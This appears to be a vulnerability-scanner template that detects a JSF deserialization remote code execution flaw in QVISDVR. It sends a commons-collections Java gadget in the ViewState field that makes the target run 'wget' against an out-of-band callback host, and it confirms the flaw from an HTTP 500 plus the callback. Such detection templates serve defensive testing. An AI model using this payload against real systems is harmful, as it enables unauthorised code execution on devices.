id: qvisdvr-deserialization-rce

info:
  author: me9187
  name: QVISDVR JSF Deserialization - Remote Code Execution
  severity: critical
  reference: https://twitter.com/Me9187/status/1414606876575162373
  tags: qvisdvr,rce,deserialization,jsf,iot

requests:
  - raw:
      - |
        GET /qvisdvr/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

    extractors:
      - type: regex
        name: token
        group: 1
        internal: true
        part: header
        regex:
          - "JSESSIONID=(.*)"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500

      - type: word
        part: interactsh_protocol
        words:
          - http